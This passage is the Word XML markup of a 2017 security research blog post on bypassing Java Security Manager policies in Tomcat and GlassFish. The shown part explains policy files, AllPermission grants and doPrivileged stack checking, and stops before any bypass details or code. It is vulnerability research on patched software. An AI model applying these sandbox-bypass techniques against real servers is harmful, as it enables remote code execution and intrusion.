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5D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="300" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId8" w:tgtFrame="_self" w:history="1">
        <w:r w:rsidRPr="00005D3D">
          <w:rPr>
            <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
            <w:color w:val="000000"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>alvaro_munoz</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>on </w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="777777"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‎04-05-2017</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="777777"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="777777"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>12:31 PM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1903095" cy="1426845"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="图片 2" descr="exploi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loit.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3095" cy="1426845"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>During our </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00005D3D">
          <w:rPr>
            <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
            <w:color w:val="333333"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>BlackHat talk</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> last summer, we presented a subset of the exploits we identified, based upon hundreds (200+) of identified Remote Code Execution (RCE) deserialization gadgets, related to CORBA stubs. Since over 50 of these gadgets are present in the Java Runtime library, they are always available in the classpath for the attacker to use and do not require any third-party library. Additionally, there were over 200 gadgets present in an application server’s classpath. These gadgets require a Security Manager to be installed in order to achieve remote code execution, which means that in order to use these gadgets, the attacker needs to be able to bypass its policy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>In order to understand the relevance and impact of these RCE gadgets, we decided to take a look at default security policies available for Servlet containers and application servers. We audited their Security Manager policies looking for ways of running unprivileged code with full permissions. At that time, we quickly found several bypasses which proved how relevant the RCE gadgets were. In this blog post we will share the details on how we bypassed the Security Manager Policy of two of these Application Servers: Tomcat and GlassFish which have released patches for the bypasses.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Security Manager 101</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Java Security Manager enforces a Security Policy which defines what permissions are allowed for different codebases (origin of the code). It can read the policy in different ways:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>From </w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>policy.url.&lt;n&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> properties from </w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;home&gt;/lib/security/java.security</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> file. Eg:</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>policy.url.1=file:${java.home}/lib/security/java.policy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>From custom Policy file specified with </w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-Djava.security.policy=someURL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Programmatically with </w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>java.security.Policy.setPolicy()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>As we mentioned above, permissions are based on the codebase (location from where the class is loaded. Eg: folder, URL, etc.). There are privileged codebases that have all, or extensive, permissions. For example in </w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/lib/security/java.security</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>grant codeBase "file:${{java.ext.dirs}}/*" {</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>       permission java.security.AllPermission;</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The above default configuration gives </w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AllPermission</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> to classes loaded from the JRE ext folder.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>When code needs to run a privileged operation, it calls any of the Security Manager check methods which in turn analyze the whole calling stack to ensure that all classes in the stack have permissions to perform the operation. If not, the check will throw a Security Exception.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The Java Security Architecture (JSA) defines ways for unprivileged code to perform privileged operations using</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AccessController.doPrivileged()</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00005D3D">
          <w:rPr>
            <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
            <w:color w:val="333333"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Java documentation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> explains how it works:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“A caller can be marked as being "privileged" (see doPrivileged and below). When making access control decisions, the checkPermission method stops checking if it reaches a caller that was marked as "privileged" via a doPrivileged call without a context argument (see below for information about a context argument). If that caller's domain has the specified permission, no further checking is done and checkPermission returns quietly, indicating that the requested access is allowed. If that domain does not have the specified permission, an exception is thrown, as usual.”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>When analyzing a call stack, the Security Manager will only check those stack frames between the check permission call and the first </w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>doPrivileged</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> call it finds on the call stack. This means that no matter where the code is loaded from, if there is a call to</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>doPrivileged</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> from a trusted class, and from that frame on all call stack frames belong to trusted classes, the permission check will succeed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Defining a Security Manager policy for big applications is a very complex task. In order to allow desired functionality, it is easy to grant too many privileges to the code that can be abused to perform these types of bypasses. Let's see how it can be done with real-world policies.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Oracle GlassFish</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
